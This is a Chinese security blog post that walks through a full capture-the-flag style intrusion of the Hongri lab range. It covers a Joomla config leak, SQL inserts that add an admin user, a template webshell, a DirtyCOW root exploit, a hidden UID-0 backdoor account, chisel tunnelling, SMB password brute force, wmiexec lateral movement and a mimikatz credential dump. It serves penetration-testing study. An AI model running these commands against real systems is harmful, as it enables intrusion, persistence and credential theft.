freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

ATT&CK 实战分享(三)
GODUNTONG 2021-08-28 17:23:27 130472

声明:

本文仅供学习网络安全行业的朋友们参考,同时是记录自己成长的随笔记录,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,我们将不承担任何法律及连带责任。

一、环境搭建

1.环境搭建测试

红日靶场地址

1.1 网络所示

1630142059_6129fe6bc54674fe7d208.jpg!small?1630142060090

目标:域控中存在一份重要文件。

本次环境为黑盒测试,不提供虚拟机账号密码。

2.信息收集

2.1 CMS识别

python3 cmseek.py -u http://192.168.134.130/

1630142071_6129fe7775ed9f598157b.png!small?1630142071689

2.2 端口扫描

nmap -A -sV 192.168.134.130

1630142077_6129fe7db6d705051e828.png!small?1630142078013

2.3 目录探测

DirBuster目录探测

1630142084_6129fe84ef156fc079dc7.png!small?1630142085226

后台地址:http://192.168.134.130/administrator/

1630142091_6129fe8b001c182245e21.png!small?1630142091202

二、漏洞探测与提权

1、漏洞利用

1.1 从信息泄露到登录后台

cmseek扫描到一个配置文件http://192.168.134.130/configuration.php~,尝试访问。

1630142096_6129fe90667225e99d0cb.png!small?1630142096594

尝试连接mysql

1630142100_6129fe9470ea7019aa2e4.png!small?1630142100662

1630142115_6129fea312ea59a94f7b5.png!small?1630142115313

Joomla后台密码为MD5加密,破解代价很大,尝试重置管理员密码,附:如何恢复或重置管理员密码?

MySQL [joomla]> INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

MySQL [joomla]> INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

1630142121_6129fea9c7deba69dec51.png!small?1630142122085

登录后台

1630142125_6129fead5f0dbce8acb5a.png!small?1630142125626

1.2 Joomla远程命令执行

进入extensions -> templates -> templates -> beez3 -> new file,新建文件123.php。

URL:http://192.168.134.130/templates/beez3/123.php

1630142130_6129feb2efc98bd4ce25a.png!small?1630142131188

冰蝎连接

1630142133_6129feb5f20705c68252a.png!small?1630142134246

2、继续收集信息

发现有可用的账号密码:wwwuser/wwwuser_123Aqx

1630142138_6129feba06d39421b006d.png!small?1630142138222

尝试登录后继续收集信息

1630142146_6129fec2141fe087b59f4.png!small?1630142146349

3、提权及权限维持

## 脏牛提权
gcc -pthread dirty.c -o dirty -lcrypt
./dirty godunt123

1630142151_6129fec7684306516a23e.png!small?1630142151661

1630142154_6129fecac292cfd40f268.png!small?1630142154969

创建后门账号godunt

useradd -p `openssl passwd -1 -salt 'salt' 123456` godunt123 -o -u 0 -g root -G root -s /bin/bash -d /home/mysqld

1630142159_6129fecf4af9cdf3c4caa.png!small?1630142159766

三、内网渗透

1、内网主机探测

[firefart@localhost tmp]# for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

1630142163_6129fed3d01b9de6850d4.png!small?1630142164053

2、构建通道

1.1 代理转发

[firefart@localhost ~]# ./chisel server -p 1080 --socks5

1630142175_6129fedfac54e99f4164a.png!small?1630142175896

root@kali:~/05_Channel_construction/chisel_1.7.6# ./chisel client 192.168.134.130:1080 socks

1630142180_6129fee4da59720eb4486.png!small?1630142181091

修改/etc/proxychains.conf

1630142190_6129feee3008c23eaa65e.png!small?1630142190533

3、内网扫描

3.1 系统信息

我们可以利用Metasploitauxiliary/scanner/smb/smb_version获取一些系统信息。

1630142207_6129feffb09deebc81bcd.png!small?1630142207934

结果如下:

1630142215_6129ff075d5ed9c6269eb.png!small?1630142215706

3.2 端口信息

root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.10
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.20
root@kali:~# proxychains nmap -p21,22,135,445,80,53,3389,8080,1433,8080 192.168.93.30
## 开放53端口,很有可能是域控

1630142220_6129ff0c8189e3bf47293.png!small?1630142220771

3.3 漏洞信息

三台主机都开启了445端口,测试下MS17-010,利用auxiliary/scanner/smb/smb_ms17_010

1630142224_6129ff10884a73135c264.png!small?1630142224874

3.4 密码爆破

尝试爆破administrator的密码,利用auxiliary/scanner/smb/smb_login模块配合自己收藏的字典。

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > set SMBUSER administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /root/11_password_dic/PasswordDic-master/2021_top100.txt
msf6 auxiliary(scanner/smb/smb_login) > set threads 20
msf6 auxiliary(scanner/smb/smb_login) > exploit

1630142229_6129ff15417a7c5047dbb.png!small?1630142229475

4、横向移动

4.1 wmiexec

使用wmiexec获取域成员主机(192.168.93.20/192.168.93.30)权限。

1630142242_6129ff2225f07baf9604f.png!small?1630142242362

1630142246_6129ff262f0673c3bc130.png!small?1630142246421

4.2 获取主机凭证

上传mimikatz.exe到192.168.93.20。

root@kali:~# proxychains smbclient //192.168.93.20/C$ -U administrator
Enter: 123qwe!ASD

1630142255_6129ff2fda855f8541123.png!small?1630142256135

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

1630142259_6129ff33ad66bcc36d65c.png!small?1630142259944

获得域成员administrator/zxcASDqw123!!的密码。

1630142264_6129ff38ea283baa4fa08.png!small?1630142265257

5、域渗透

5.1 IPC$

C:\>net use \\192.168.93.10\admin$ zxcASDqw123!! /user:test\administrator   
#系统默认路径c:\windows\下
C:\>dir \\192.168.93.10\C$\users\administrator\Documents
C:\>type \\192.168.93.10\C$\users\administrator\Documents\flag.txt

1630142271_6129ff3f15d50b64ae122.png!small?1630142271293

得到Flag!

总结回顾

本期是ATT&CK实战系列分享第三篇,在本着完成工作任务之余,也需要不断学习、不断进步。一句话,信任前期跟着思路慢慢学习复现,后期逐渐积累吸收,才会有更大的收获。承蒙厚爱,ATT&CK实战系列持续更新!

# web安全 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 GODUNTONG 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
ATT & CK 实战系列
GODUNTONG LV.2
这家伙太懒了,还未填写个人描述!
  • 4 文章数
  • 15 关注者
ATT&CK 实战分享(二)
2021-08-28
ATT & CK 实战分享(一)
2021-08-28
邮件安全之浅析订阅类邮件
2021-08-05
文章目录